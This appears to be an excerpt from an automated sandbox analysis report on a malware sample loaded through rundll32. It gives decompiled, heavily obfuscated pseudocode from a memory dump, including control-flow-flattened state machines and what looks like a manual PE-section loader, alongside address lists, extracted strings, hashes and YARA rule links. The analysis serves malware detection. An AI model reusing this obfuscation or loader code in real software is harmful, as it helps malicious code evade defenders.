							_t191 = _v60;
							_t182 = E002A9AE2(_v60, _v104, _v80, _v108,  &_v36,  &_v28);
							_t213 =  &(_t213[4]);
							asm("sbb esi, esi");
							_t208 = ( ~_t182 & 0xe815f23c) + 0x1e157ff7;
							continue;
						}
					}
					if(_t208 == 0x2855765d) {
						E00292231(_t207, _v44, _v64);
						_pop(_t191);
						_t208 = 0x7c17df7;
						goto L21;
					}
					if(_t208 == 0x28bc7ea6) {
						_t208 = 0x2855765d;
						if(_v40 > 2) {
							_t184 = E00298F55( *((intOrPtr*)(_t207 + 8)),  &_v32, _v68, _v48);
							_v36 = _t184;
							_pop(_t191);
							if(_t184 != 0) {
								_t208 = 0x15d49008;
							}
						}
						goto L1;
					}
					if(_t208 != 0x2949e215) {
						goto L21;
					}
					_t191 =  &_v40;
					_t185 = E002A7519( &_v40, _v72, _t212, _v76, _v84, _v88);
					_t207 = _t185;
					_t213 =  &(_t213[4]);
					if(_t185 == 0) {
						break;
					}
					_t208 = 0x28bc7ea6;
					goto L1;
					L21:
				} while (_t208 != 0x7c17df7);
				return _t186;
			}

0x002a8978
0x002a897b
0x002a8986
0x002a8988
0x002a898c
0x002a8990
0x002a8998
0x002a89a0
0x002a89a8
0x002a89ad
0x002a89b2
0x002a89ba
0x002a89c2
0x002a89c7
0x002a89cf
0x002a89d7
0x002a89e8
0x002a89ed
0x002a89f3
0x002a89fb
0x002a8a00
0x002a8a08
0x002a8a0d
0x002a8a15
0x002a8a1d
0x002a8a25
0x002a8a2d
0x002a8a35
0x002a8a3d
0x002a8a42
0x002a8a4a
0x002a8a52
0x002a8a57
0x002a8a5f
0x002a8a67
0x002a8a6f
0x002a8a74
0x002a8a7c
0x002a8a84
0x002a8a89
0x002a8a91
0x002a8a99
0x002a8aa1
0x002a8aa9
0x002a8ab1
0x002a8ab9
0x002a8ac1
0x002a8ac9
0x002a8ad1
0x002a8ad9
0x002a8ae1
0x002a8ae6
0x002a8aeb
0x002a8af0
0x002a8af8
0x002a8b04
0x002a8b07
0x002a8b0b
0x002a8b13
0x002a8b1b
0x002a8b23
0x002a8b2b
0x002a8b33
0x002a8b3b
0x002a8b40
0x002a8b48
0x002a8b50
0x002a8b5d
0x002a8b66
0x002a8b6a
0x002a8b72
0x002a8b7a
0x002a8b87
0x002a8b8b
0x002a8b93
0x002a8b9b
0x002a8ba3
0x002a8ba8
0x002a8bb0
0x002a8bb4
0x002a8bb4
0x002a8bb8
0x002a8bb8
0x002a8bb8
0x002a8bb8
0x002a8bbe
0x00000000
0x00000000
0x002a8bc4
0x002a8c84
0x002a8c89
0x002a8c8a
0x00000000
0x002a8c8a
0x002a8bd0
0x002a8c54
0x002a8c59
0x002a8c60
0x002a8c64
0x002a8c67
0x002a8c68
0x002a8c6d
0x00000000
0x002a8c6d
0x002a8bd8
0x002a8c36
0x00000000
0x002a8c36
0x002a8be0
0x002a8c2d
0x002a8c2f
0x00000000
0x002a8c2f
0x002a8be8
0x00000000
0x002a8bee
0x002a8c04
0x002a8c08
0x002a8c0d
0x002a8c14
0x002a8c1c
0x00000000
0x002a8c1c
0x002a8be8
0x002a8c9a
0x002a8d1f
0x002a8d24
0x002a8d25
0x00000000
0x002a8d25
0x002a8ca2
0x002a8cde
0x002a8ce3
0x002a8cf8
0x002a8cfd
0x002a8d02
0x002a8d05
0x002a8d0b
0x002a8d0b
0x002a8d05
0x00000000
0x002a8ce3
0x002a8caa
0x00000000
0x00000000
0x002a8cb0
0x002a8cc1
0x002a8cc6
0x002a8cc8
0x002a8ccd
0x00000000
0x00000000
0x002a8ccf
0x00000000
0x002a8d2a
0x002a8d2a
0x002a8d3f

Strings

6>, xrefs: 002A8B0B
*V, xrefs: 002A89F3
]vU(, xrefs: 002A8C8A
]vU(, xrefs: 002A8CDE
*", xrefs: 002A8B93
j(B, xrefs: 002A8B8B
]vU(, xrefs: 002A8C94

Memory Dump Source

Source File: 00000007.00000002.2094802545.0000000000291000.00000020.00000001.sdmp, Offset: 00290000, based on PE: true

Associated: 00000007.00000002.2094797808.0000000000290000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2094817635.00000000002AF000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_290000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: *"$*V$6>$]vU($]vU($]vU($j(B
API String ID: 0-1867390483
Opcode ID: 8b7dbe73e1f24f950d57e71bd6f0297f697e301d57489fede1b70e3b574a5418
Instruction ID: 7b7c3d2cf9d2990f8a0dcc93e5acad8bb511864818e9d1893dbbe0c94c05178d
Opcode Fuzzy Hash: 8b7dbe73e1f24f950d57e71bd6f0297f697e301d57489fede1b70e3b574a5418
Instruction Fuzzy Hash: CC9176724183019FC364DF65C48941BFBF1BB85358F508A5DF4E9A6260DBB58919CF43

Uniqueness

Uniqueness Score: -1.00%

Function 002959B8, Relevance: 8.9, Strings: 7, Instructions: 194
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E002959B8(void* __ecx, void* __edx, void* __edi, void* __ebp, void* __eflags, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				void* _t183;
				void* _t201;
				void* _t212;
				signed int _t214;
				signed int _t215;
				signed int _t216;
				signed int _t217;
				signed int _t218;
				signed int _t219;
				intOrPtr _t220;
				void* _t253;
				void* _t256;
				void* _t260;
				signed int* _t263;
				signed int* _t264;
				signed int* _t265;

				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(3);
				_push(__edx);
				_push(__ecx);
				E0029E171(_t183);
				_v40 = 0x30ee;
				_v40 = _v40 + 0xce3d;
				_v40 = _v40 >> 0xe;
				_v40 = _v40 ^ 0x00001003;
				_v28 = 0x367f;
				_t214 = 0x4f;
				_v28 = _v28 / _t214;
				_v28 = _v28 + 0xe7c6;
				_v28 = _v28 ^ 0x00006876;
				_v12 = 0x9b15;
				_v12 = _v12 + 0xffffd016;
				_v12 = _v12 ^ 0x00004b2b;
				_v48 = 0x1065;
				_v48 = _v48 + 0xffffdfe8;
				_v48 = _v48 >> 0xc;
				_v48 = _v48 ^ 0x000f8679;
				_v68 = 0x1d00;
				_t215 = 5;
				_v68 = _v68 / _t215;
				_t216 = 0xb;
				_v68 = _v68 * 0x46;
				_v68 = _v68 + 0x3dbf;
				_v68 = _v68 ^ 0x000193af;
				_v52 = 0x69aa;
				_v52 = _v52 << 6;
				_v52 = _v52 * 0x2f;
				_v52 = _v52 ^ 0x04d9f716;
				_v72 = 0xc27e;
				_v72 = _v72 / _t216;
				_t217 = 0x1a;
				_v72 = _v72 / _t217;
				_v72 = _v72 >> 0xb;
				_v72 = _v72 ^ 0x00005e66;
				_v64 = 0xd656;
				_v64 = _v64 << 6;
				_v64 = _v64 >> 2;
				_t218 = 0x6e;
				_v64 = _v64 / _t218;
				_v64 = _v64 ^ 0x00000c6b;
				_v16 = 0xae5b;
				_t219 = 0x3b;
				_v16 = _v16 / _t219;
				_v16 = _v16 ^ 0x000076a2;
				_v20 = 0x1039;
				_v20 = _v20 | 0x82266672;
				_v20 = _v20 ^ 0x82265208;
				_v24 = 0x8f4e;
				_v24 = _v24 + 0x14fa;
				_v24 = _v24 ^ 0x0000f100;
				_v60 = 0x9e8d;
				_v60 = _v60 + 0xffff079d;
				_t220 = _a12;
				_v60 = _v60 * 0x44;
				_v60 = _v60 << 2;
				_v60 = _v60 ^ 0xffa0d289;
				_v8 = 0xa83d;
				_v8 = _v8 ^ 0xd1fece0e;
				_v8 = _v8 ^ 0xd1fe7b06;
				_v56 = 0xdaa;
				_v56 = _v56 + 0xd60;
				_v56 = _v56 | 0x6744239d;
				_v56 = _v56 * 0x18;
				_v56 = _v56 ^ 0xae65cea3;
				_v4 = 0x612f;
				_v4 = _v4 + 0xffffdc20;
				_v4 = _v4 ^ 0x000072d4;
				_v32 = 0xc2c2;
				_v32 = _v32 >> 6;
				_v32 = _v32 ^ 0xd029cfc4;
				_v32 = _v32 ^ 0xd029926f;
				_v36 = 0xc1df;
				_v36 = _v36 << 5;
				_v36 = _v36 ^ 0x9860b233;
				_v36 = _v36 ^ 0x9878f6e4;
				_v44 = 0x7d22;
				_v44 = _v44 + 0xffff6b70;
				_v44 = _v44 + 0xad25;
				_v44 = _v44 ^ 0x000095f7;
				_t201 = E0029E100(_t220, _v48, _a8, _v68, _v52, _v72);
				_t212 = _t201;
				_t263 =  &(( &_v72)[0xa]);
				if(_t212 == 0) {
					return _t201;
				}
				_push(_t220);
				_t256 = E002A84F6(_v12 | _v40, _v64, _v16,  *((intOrPtr*)(_t212 + 0x50)), _v20, _v44, _v24);
				_t264 =  &(_t263[6]);
				if(_t256 == 0) {
					L7:
					return _t256;
				}
				E0029689F(_v60, _a12,  *((intOrPtr*)(_t212 + 0x54)), _t256, _v8);
				_t265 =  &(_t264[3]);
				_t253 = ( *(_t212 + 0x14) & 0x0000ffff) + 0x18 + _t212;
				_t260 = ( *(_t212 + 6) & 0x0000ffff) * 0x28 + _t253;
				while(_t253 < _t260) {
					_t207 =  <  ?  *((void*)(_t253 + 8)) :  *((intOrPtr*)(_t253 + 0x10));
					E0029689F(_v56,  *((intOrPtr*)(_t253 + 0x14)) + _a12,  <  ?  *((void*)(_t253 + 8)) :  *((intOrPtr*)(_t253 + 0x10)),  *((intOrPtr*)(_t253 + 0xc)) + _t256, _v4);
					_t265 =  &(_t265[3]);
					_t253 = _t253 + 0x28;
				}
				E00295843(_t256, _t212);
				if(E00298994(_t256, _t212) == 0) {
					E0029EE72(_t256, _v28, _v32, _v36);
					_t256 = 0;
				}
				goto L7;
			}

0x002959bc
0x002959c0
0x002959c4
0x002959c8
0x002959ca
0x002959cb
0x002959cc
0x002959d1
0x002959db
0x002959e3
0x002959e8
0x002959f0
0x002959fe
0x00295a03
0x00295a09
0x00295a11
0x00295a19
0x00295a21
0x00295a29
0x00295a31
0x00295a39
0x00295a41
0x00295a46
0x00295a4e
0x00295a5a
0x00295a5f
0x00295a6a
0x00295a6d
0x00295a71
0x00295a79
0x00295a81
0x00295a89
0x00295a93
0x00295a97
0x00295a9f
0x00295aaf
0x00295ab7
0x00295abc
0x00295ac2
0x00295ac7
0x00295acf
0x00295ad7
0x00295adc
0x00295ae5
0x00295aea
0x00295af0
0x00295af8
0x00295b04
0x00295b07
0x00295b0b
0x00295b13
0x00295b1b
0x00295b23
0x00295b2b
0x00295b33
0x00295b3b
0x00295b43
0x00295b4b
0x00295b58
0x00295b5c
0x00295b60
0x00295b65
0x00295b6d
0x00295b75
0x00295b7d
0x00295b85
0x00295b8d
0x00295b95
0x00295ba2
0x00295ba6
0x00295bae
0x00295bb6
0x00295bbe
0x00295bc6
0x00295bce
0x00295bd3
0x00295bdb
0x00295be3
0x00295beb
0x00295bf0
0x00295bf8
0x00295c00
0x00295c08
0x00295c10
0x00295c18
0x00295c34
0x00295c39
0x00295c3b
0x00295c40
0x00295d0d
0x00295d0d
0x00295c47
0x00295c6c
0x00295c6e
0x00295c73
0x00295d06
0x00000000
0x00295d08
0x00295c8b
0x00295c94
0x00295ca1
0x00295ca3
0x00295cd2
0x00295cbe
0x00295cc7
0x00295ccc
0x00295ccf
0x00295ccf
0x00295cda
0x00295cec
0x00295cfc
0x00295d04
0x00295d04
0x00000000

Strings

`, xrefs: 00295B8D
"}, xrefs: 00295C00
0, xrefs: 002959D1
+K, xrefs: 00295A29
f^, xrefs: 00295AC7
vh, xrefs: 00295A11
/a, xrefs: 00295BAE

Memory Dump Source

Source File: 00000007.00000002.2094802545.0000000000291000.00000020.00000001.sdmp, Offset: 00290000, based on PE: true

Associated: 00000007.00000002.2094797808.0000000000290000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2094817635.00000000002AF000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_290000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: "}$+K$/a$`$f^$vh$0
API String ID: 0-789538697
Opcode ID: 88494ec276fcd568e33f799efef576c5a39aa73ad999bbc6a1c742eac1be33c4
Instruction ID: 6bcd5136a4ceb3c8289f1908225d5e1d06e02d4855b12b5a234c556850724274
Opcode Fuzzy Hash: 88494ec276fcd568e33f799efef576c5a39aa73ad999bbc6a1c742eac1be33c4
Instruction Fuzzy Hash: 2C9144716083409FD758CFA5C88940BFBF2BBC8758F108A1DF199962A0D7BADA55CF42

Uniqueness

Uniqueness Score: -1.00%

Function 002AA2EA, Relevance: 8.9, Strings: 7, Instructions: 158
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E002AA2EA(void* __ecx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				char _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				void* _t134;
				void* _t148;
				intOrPtr _t151;
				void* _t156;
				signed int _t167;
				signed int _t168;
				void* _t170;
				signed int* _t173;

				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(1);
				_push(_a4);
				_push(1);
				_push(__ecx);
				E0029E171(_t134);
				_v32 = 0xa90;
				_t173 =  &(( &_v56)[8]);
				_v32 = _v32 ^ 0x5a78797d;
				_v32 = _v32 << 0xc;
				_t170 = 0;
				_v32 = _v32 ^ 0x873ef055;
				_t156 = 0x1309d555;
				_v8 = 0x83dc;
				_v8 = _v8 + 0xf6a3;
				_v8 = _v8 ^ 0x00010932;
				_v52 = 0x117;
				_v52 = _v52 >> 0xd;
				_t167 = 0x19;
				_v52 = _v52 / _t167;
				_v52 = _v52 >> 2;
				_v52 = _v52 ^ 0x000065d1;
				_v56 = 0xdf3b;
				_v56 = _v56 << 0x10;
				_v56 = _v56 << 0xa;
				_v56 = _v56 ^ 0x0d6c932b;
				_v56 = _v56 ^ 0xe16ce70e;
				_v20 = 0xfb4d;
				_v20 = _v20 + 0x65d2;
				_v20 = _v20 | 0x70480adf;
				_v20 = _v20 ^ 0x7049567e;
				_v44 = 0xdc55;
				_v44 = _v44 >> 1;
				_v44 = _v44 ^ 0x202d7d54;
				_v44 = _v44 + 0x4b1d;
				_v44 = _v44 ^ 0x202d43d3;
				_v24 = 0x2d7e;
				_v24 = _v24 << 0xe;
				_t168 = 0x69;
				_v24 = _v24 * 0x53;
				_v24 = _v24 ^ 0xaff6d2d8;
				_v48 = 0xa367;
				_v48 = _v48 * 0x41;
				_v48 = _v48 >> 7;
				_v48 = _v48 + 0xba74;
				_v48 = _v48 ^ 0x00016ffb;
				_v28 = 0x1a59;
				_v28 = _v28 + 0xffffa465;
				_v28 = _v28 / _t168;
				_v28 = _v28 ^ 0x027042fd;
				_v36 = 0xc361;
				_v36 = _v36 * 0x64;
				_v36 = _v36 >> 4;
				_v36 = _v36 >> 7;
				_v36 = _v36 ^ 0x0000774a;
				_v40 = 0xfafe;
				_v40 = _v40 * 0x26;
				_v40 = _v40 ^ 0x6e9b26fb;
				_v40 = _v40 ^ 0x7c82e7d8;
				_v40 = _v40 ^ 0x123cb693;
				_v12 = 0xb317;
				_v12 = _v12 * 0x69;
				_v12 = _v12 + 0xffff464a;
				_v12 = _v12 ^ 0x00489ad9;
				_v16 = 0xb75d;
				_v16 = _v16 * 0x44;
				_v16 = _v16 ^ 0x974e34a4;
				_v16 = _v16 ^ 0x977ecfc3;
				_t169 = _v4;
				do {
					while(_t156 != 0x764e013) {
						if(_t156 == 0x1309d555) {
							_t156 = 0x2721d6b9;
							continue;
						} else {
							if(_t156 == 0x263f2319) {
								_t148 = E002A1D5A(_v8, _t169,  &_v4, _v52, _v56);
								_t173 =  &(_t173[3]);
								if(_t148 != 0) {
									_t156 = 0x764e013;
									continue;
								}
							} else {
								if(_t156 == 0x2721d6b9) {
									_t151 = E00296DE7();
									_t169 = _t151;
									if(_t151 != 0xffffffff) {
										_t156 = 0x263f2319;
										continue;
									}
								} else {
									if(_t156 != 0x335f0a5e) {
										goto L14;
									} else {
										E002A0DE5(_v36, _v12, _v4, _v16);
									}
								}
							}
						}
						L7:
						return _t170;
					}
					E002A8893(_v4, 1, _t156, _v20, _v44, 1, _a20, _v24, _a4, _v48, _v28);
					_t173 =  &(_t173[9]);
					_t156 = 0x335f0a5e;
					_t170 =  !=  ? 1 : _t170;
					L14:
				} while (_t156 != 0x2e1c6412);
				goto L7;
			}

0x002aa2f1
0x002aa2f7
0x002aa2fc
0x002aa300
0x002aa304
0x002aa305
0x002aa309
0x002aa30a
0x002aa30b
0x002aa310
0x002aa318
0x002aa31b
0x002aa325
0x002aa32a
0x002aa32c
0x002aa334
0x002aa339
0x002aa341
0x002aa349
0x002aa351
0x002aa359
0x002aa364
0x002aa369
0x002aa36f
0x002aa374
0x002aa37c
0x002aa384
0x002aa389
0x002aa38e
0x002aa396
0x002aa39e
0x002aa3a6
0x002aa3ae
0x002aa3b6
0x002aa3be
0x002aa3c6
0x002aa3ca
0x002aa3d2
0x002aa3da
0x002aa3e2
0x002aa3ea
0x002aa3f4
0x002aa3f5
0x002aa3f9
0x002aa401
0x002aa40e
0x002aa412
0x002aa417
0x002aa41f
0x002aa427
0x002aa42f
0x002aa43d
0x002aa441
0x002aa449
0x002aa456
0x002aa45a
0x002aa45f
0x002aa464
0x002aa46c
0x002aa479
0x002aa47d
0x002aa485
0x002aa48d
0x002aa495
0x002aa4a7
0x002aa4ab
0x002aa4b3
0x002aa4bb
0x002aa4c8
0x002aa4cc
0x002aa4d4
0x002aa4dc
0x002aa4e0
0x002aa4e0
0x002aa4ee
0x002aa56f
0x00000000
0x002aa4f0
0x002aa4f6
0x002aa55c
0x002aa561
0x002aa566
0x002aa568
0x00000000
0x002aa568
0x002aa4f8
0x002aa4fe
0x002aa536
0x002aa53b
0x002aa540
0x002aa542
0x00000000
0x002aa542
0x002aa500
0x002aa506
0x00000000
0x002aa50c
0x002aa520
0x002aa525
0x002aa506
0x002aa4fe
0x002aa4f6
0x002aa529
0x002aa531
0x002aa531
0x002aa59d
0x002aa5a2
0x002aa5a5
0x002aa5ac
0x002aa5af
0x002aa5af
0x00000000

Strings

T}- , xrefs: 002AA3CA
Jw, xrefs: 002AA464
~VIp, xrefs: 002AA3B6
}yxZ, xrefs: 002AA31B
^_3, xrefs: 002AA5A5
^_3, xrefs: 002AA500
~-, xrefs: 002AA3E2

Memory Dump Source

Source File: 00000007.00000002.2094802545.0000000000291000.00000020.00000001.sdmp, Offset: 00290000, based on PE: true

Associated: 00000007.00000002.2094797808.0000000000290000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2094817635.00000000002AF000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_290000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: Jw$T}- $^_3$^_3$}yxZ$~-$~VIp
API String ID: 0-116321829
Opcode ID: 2097efc7bf4065b321c8f2cd6d709f50e6b6bcde55bf29a4a2f3ec24c11f23ba
Instruction ID: c17872909a484f49925e0bb7e1b16bb3a1e72a197a596f468b0cc01cd45ca408
Opcode Fuzzy Hash: 2097efc7bf4065b321c8f2cd6d709f50e6b6bcde55bf29a4a2f3ec24c11f23ba
Instruction Fuzzy Hash: BC7120B1508341AFC358CE61C88942FBBE2BFC8798F505A1DF09696260D7B5CA68CF47

Uniqueness

Uniqueness Score: -1.00%

Function 0029427A, Relevance: 8.9, Strings: 7, Instructions: 134
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E0029427A() {
				signed int _v4;
				intOrPtr _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _t123;
				intOrPtr _t124;
				signed int _t128;
				signed int _t129;
				intOrPtr _t130;
				void* _t140;
				signed int* _t142;

				_t142 =  &_v56;
				_v4 = _v4 & 0x00000000;
				_v8 = 0x7a10b6;
				_v40 = 0xd47c;
				_v40 = _v40 ^ 0xc9c15fd8;
				_t128 = 0x17;
				_v40 = _v40 / _t128;
				_v40 = _v40 ^ 0x08c597d1;
				_t140 = 0x1cacda0c;
				_v16 = 0x5e58;
				_t129 = 0x57;
				_v16 = _v16 * 0x35;
				_v16 = _v16 ^ 0x0013fcf5;
				_v44 = 0x66ed;
				_v44 = _v44 * 0x61;
				_v44 = _v44 << 5;
				_v44 = _v44 ^ 0x04dff070;
				_v20 = 0x5c2b;
				_v20 = _v20 * 0x67;
				_v20 = _v20 ^ 0x00257697;
				_v24 = 0x4ab9;
				_v24 = _v24 ^ 0x3f11ade3;
				_v24 = _v24 ^ 0x3f11c8b2;
				_v56 = 0x5d4f;
				_v56 = _v56 + 0x4a0c;
				_v56 = _v56 << 1;
				_v56 = _v56 ^ 0x00014480;
				_v48 = 0x2489;
				_v48 = _v48 * 0x33;
				_v48 = _v48 ^ 0x539286e1;
				_v48 = _v48 ^ 0x5395d040;
				_v28 = 0x961f;
				_v28 = _v28 + 0x767b;
				_v28 = _v28 + 0x6868;
				_v28 = _v28 ^ 0x00011112;
				_v32 = 0x354a;
				_v32 = _v32 ^ 0x6ae76b29;
				_v32 = _v32 | 0x68b8a72b;
				_v32 = _v32 ^ 0x6afffcbe;
				_v52 = 0xb360;
				_v52 = _v52 + 0x3451;
				_v52 = _v52 / _t129;
				_v52 = _v52 | 0xaa821ec8;
				_v52 = _v52 ^ 0xaa82629d;
				_v12 = 0x5a5f;
				_v12 = _v12 + 0xffff6d93;
				_v12 = _v12 ^ 0xfffffcd5;
				_v36 = 0xf584;
				_v36 = _v36 | 0xbd617d7d;
				_v36 = _v36 * 0x31;
				_v36 = _v36 ^ 0x3fc1ce7b;
				_t130 =  *0x2b0714; // 0x0
				do {
					while(_t140 != 0x1cacda0c) {
						if(_t140 == 0x260b3ab0) {
							_t123 = E0029D5AA(_v24, _v56, _t130, _v48);
							_t130 =  *0x2b0714; // 0x0
							_t142 = _t142 - 0xc + 0x14;
							_t140 = 0x334b8e8f;
							 *((intOrPtr*)(_t130 + 0x24)) = _t123;
							continue;
						} else {
							if(_t140 != 0x334b8e8f) {
								goto L10;
							} else {
								_t124 = E002A063C(_v28, _v32, _t130, _v52, E002A8E79, _v12, _t130, 0, _t130, _t130, _v36);
								_t130 =  *0x2b0714; // 0x0
								 *((intOrPtr*)(_t130 + 0xc)) = _t124;
							}
						}
						L5:
						return 0 | _t130 != 0x00000000;
					}
					_push(_t130);
					_push(_t130);
					_t130 = E002A9E2B(0x40);
					_t142 =  &(_t142[3]);
					 *0x2b0714 = _t130;
					if(_t130 == 0) {
						_t140 = 0x2ed782eb;
						goto L10;
					} else {
						_t140 = 0x260b3ab0;
						continue;
					}
					goto L5;
					L10:
				} while (_t140 != 0x2ed782eb);
				goto L5;
			}

0x0029427a
0x0029427d
0x00294284
0x0029428c
0x00294294
0x002942a6
0x002942ab
0x002942b1
0x002942b9
0x002942be
0x002942d5
0x002942db
0x002942df
0x002942e7
0x002942f4
0x002942f8
0x002942fd
0x00294305
0x00294312
0x00294316
0x0029431e
0x00294326
0x0029432e
0x00294336
0x00294346
0x0029434e
0x00294352
0x0029435a
0x00294367
0x0029436b
0x00294373
0x0029437b
0x00294383
0x0029438b
0x00294393
0x0029439b
0x002943a3
0x002943ab
0x002943b3
0x002943bb
0x002943c3
0x002943d1
0x002943d5
0x002943dd
0x002943e5
0x002943ed
0x002943f5
0x002943fd
0x00294405
0x00294412
0x00294416
0x0029441e
0x00294424
0x00294424
0x0029442e
0x00294487
0x0029448c
0x00294492
0x00294495
0x00294497
0x00000000
0x00294430
0x00294432
0x00000000
0x00294438
0x00294457
0x0029445c
0x00294465
0x00294465
0x00294432
0x00294469
0x00294476
0x00294476
0x002944ac
0x002944ad
0x002944b5
0x002944b7
0x002944ba
0x002944c2
0x002944cb
0x00000000
0x002944c4
0x002944c4
0x00000000
0x002944c4
0x00000000
0x002944cd
0x002944cd
0x00000000

Strings

hh, xrefs: 0029438B
_Z, xrefs: 002943E5
Q4, xrefs: 002943C3
+\, xrefs: 00294305
)kj, xrefs: 002943A3
O], xrefs: 00294336
f, xrefs: 002942E7

Memory Dump Source

Source File: 00000007.00000002.2094802545.0000000000291000.00000020.00000001.sdmp, Offset: 00290000, based on PE: true

Associated: 00000007.00000002.2094797808.0000000000290000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2094817635.00000000002AF000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_290000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: )kj$+\$O]$Q4$_Z$hh$f
API String ID: 0-1207614839
Opcode ID: faf19aa5cb0a2e25dfa9e124d54b16b20e4c0c6f02044b3628caaeec6699ef62
Instruction ID: e7dddbc4e08a0831dbbe6024ce5514d7942be021705d467943eeaaba2d16cfbd
Opcode Fuzzy Hash: faf19aa5cb0a2e25dfa9e124d54b16b20e4c0c6f02044b3628caaeec6699ef62
Instruction Fuzzy Hash: AF5165B15183429FD348DF25D58A91BFBE0FBC4708F501A1CF8965A2A0D3B4DA598F87

Uniqueness

Uniqueness Score: -1.00%

Function 0029FFB5, Relevance: 7.9, Strings: 6, Instructions: 352
COMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E0029FFB5(void* __ecx, signed int* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				void* _v12;
				intOrPtr _v16;
				char _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				unsigned int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				void* _t311;
				signed int _t368;
				signed int* _t370;
				void* _t372;
				signed int _t420;
				signed int _t421;
				signed int _t422;
				signed int _t423;
				signed int _t424;
				signed int _t425;
				signed int _t426;
				signed int _t427;
				signed int _t428;
				signed int _t429;
				signed int _t432;
				signed int* _t435;
				void* _t438;

				_t431 = _a8;
				_t370 = __edx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0029E171(_t311);
				_v16 = 0x6a5a5f;
				_t435 =  &(( &_v180)[5]);
				asm("stosd");
				_t372 = 0x37961ba0;
				asm("stosd");
				asm("stosd");
				_v172 = 0xd11d;
				_v172 = _v172 << 0xa;
				_v172 = _v172 + 0xfffff63f;
				_t420 = 9;
				_v172 = _v172 / _t420;
				_v172 = _v172 ^ 0x005cdcdc;
				_v80 = 0x7f86;
				_t421 = 0x19;
				_v80 = _v80 / _t421;
				_v80 = _v80 ^ 0x00003ead;
				_v124 = 0x1032;
				_t422 = 0x31;
				_v124 = _v124 / _t422;
				_v124 = _v124 | 0xef971e72;
				_v124 = _v124 ^ 0xef9764e2;
				_v88 = 0xc1ea;
				_v88 = _v88 ^ 0x979ca812;
				_v88 = _v88 ^ 0x979c5ffb;
				_v96 = 0x54ee;
				_v96 = _v96 << 8;
				_v96 = _v96 ^ 0x0054c254;
				_v180 = 0xd087;
				_v180 = _v180 ^ 0x59d46990;
				_t423 = 0xd;
				_v180 = _v180 / _t423;
				_t432 = 0x34;
				_v180 = _v180 / _t432;
				_v180 = _v180 ^ 0x002202bc;
				_v132 = 0x3b1a;
				_v132 = _v132 << 0xe;
				_t424 = 0x28;
				_v132 = _v132 / _t424;
				_v132 = _v132 ^ 0x005ef2d6;
				_v104 = 0xc641;
				_t425 = 7;
				_v104 = _v104 / _t425;
				_v104 = _v104 ^ 0x000065d5;
				_v76 = 0x7ab;
				_v76 = _v76 ^ 0x4ce0fc6c;
				_v76 = _v76 ^ 0x4ce08288;
				_v84 = 0xfefe;
				_v84 = _v84 + 0xffff7c94;
				_v84 = _v84 ^ 0x00001541;
				_v140 = 0x7f84;
				_v140 = _v140 | 0x4b8568cb;
				_v140 = _v140 ^ 0x9650e588;
				_v140 = _v140 ^ 0xddd58cd0;
				_v112 = 0x8bdc;
				_v112 = _v112 ^ 0x188c9e15;
				_v112 = _v112 ^ 0x57653813;
				_v112 = _v112 ^ 0x4fe9526e;
				_v152 = 0x7103;
				_t426 = 0x16;
				_v152 = _v152 / _t426;
				_v152 = _v152 + 0x71cd;
				_v152 = _v152 << 0xd;
				_v152 = _v152 ^ 0x0ede3f63;
				_v168 = 0x6706;
				_v168 = _v168 >> 4;
				_t427 = 0x5c;
				_v168 = _v168 * 0x42;
				_v168 = _v168 ^ 0x36591758;
				_v168 = _v168 ^ 0x3658a240;
				_v160 = 0x482;
				_v160 = _v160 << 0xc;
				_v160 = _v160 / _t427;
				_v160 = _v160 << 1;
				_v160 = _v160 ^ 0x0001f47e;
				_v100 = 0x7495;
				_v100 = _v100 << 6;
				_v100 = _v100 ^ 0x001d3afe;
				_v144 = 0x9dbd;
				_v144 = _v144 >> 3;
				_v144 = _v144 / _t432;
				_v144 = _v144 ^ 0x000059ff;
				_v68 = 0x84ca;
				_v68 = _v68 << 4;
